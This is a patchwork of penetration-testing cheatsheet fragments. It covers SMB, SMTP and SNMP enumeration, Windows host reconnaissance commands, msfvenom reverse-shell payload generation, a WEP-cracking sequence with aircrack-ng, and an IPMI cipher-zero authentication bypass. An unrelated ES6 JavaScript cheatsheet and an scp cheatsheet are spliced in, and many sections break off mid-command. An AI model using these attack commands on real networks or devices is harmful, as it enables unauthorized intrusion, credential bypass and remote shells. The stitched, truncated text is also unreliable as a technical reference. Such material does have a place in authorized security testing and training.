# SMB Enumeration (Server Message Block)
## Scanning for the NetBIOS Service
```ShellSession
root@kali:~# nmap -v -p 139,445 192.168.1.12 -oG /tmp/smp.txt
```
## Scanning NetBIOS using nbtscan
```ShellSession
root@kali:~# nbtscan -r 192.168.1.12
```
## Null Session Enumeration
```ShellSession
root@kali:~# enum4linux -a 192.16...
```
# SMTP Enumeration (Simple Mail Transfer Protocol)
```ShellSession
root@kali:~# nc -nv 192.168.1.12 25
(UNKNOWN) [192.168.1.12] 25 (smtp) open
220 WIN-3UR24XX66QZ Microsoft ESMTP MAIL Service, Version: 7.0.6001.18000 ready at Thu, 4 Jan 2018 11:48:35 +0200
```
...
# SNMP Enumeration (Simple Network Management Protocol)
## Fix SNMP output values so they are human readable
```ShellSession
apt-get install snmp-mibs-downloader
download-mibs
echo "" > /etc/snmp/snmp.conf
```
## Scanning for SNMP
### Using nmap
```ShellSession
root@kali:~# nmap -sU -v --open -p 161 192.168.1.12
```
...
# Vulnerability Scanning
> Vulnerability scans can generate a great deal of traffic and, in some cases, can even result in denial of service conditions on many network devices, so caution must be exercised before making use of mass vulnerability scanners on a penetration test.
## Vulnerability Scanning with Nmap
- To get all available...
net config Workstation
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
hostname
net users
ipconfig /all
route print
arp -A
netstat -ano
netsh firewall show state
netsh firewall show config
schtasks /query /fo LIST /v
tasklist /SVC
net start
DRIVERQUERY
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Install...
## Reverse Shell with Msfvenom - Cheatsheet
### List payloads
```Shell
msfvenom -l
```
Or
```Shell
msfvenom --list payloads
```
### Generate a PHP payload
```Shell
msfvenom -p php/meterpreter/reverse_tc...
```
# es6-cheatsheet
A cheatsheet containing ES2015 [ES6] tips, tricks, best practices and code
snippet examples for your day-to-day workflow. Contributions are welcome!
## Table of Contents
- [var versus let / const](#var-versus-let--const)
- [Replacing IIFEs with Blocks](#replacing-iifes-with-blocks)
- [Arrow Functions](#arrow-functions)
...
[+] Secure Copy (scp) Cheatsheet
--------------------------------
[>] Copy remote file to local host:
$ scp your_username@192.168.0.10:<remote_file> /some/local/directory
[>] Copy local file to remote host:
$ scp <local_file> your_username@192.168.0.10:/some/remote/directory
[>] Copy local directory to remote di...
WEP attack with aircrack-ng suite.
----------------------------------
airmon-ng start wlan0 <AP Channel>
airodump-ng -c <AP Channel> --bssid <AP MAC> -w <filename> wlan0mon
aireplay-ng -1 0 -e <AP ESSID> -a <AP MAC> -h <Attacker MAC> wlan0mon
aireplay-ng -3 -b <AP MAC> -h <Attacker MAC>...
Verify Various Vulnerabilities
------------------------------
[+] IPMI Cipher Suite Zero Authentication Bypass:
http://www.tenable.com/plugins/index.php?view=single&id=68931
Tools required:
ipmitool
freeipmi-tools
ipmitool -I lanplus -H 192.168.0.1 -U Administrator -P notapassword user list
# Specifying Cipher Suite Zero
ipmito...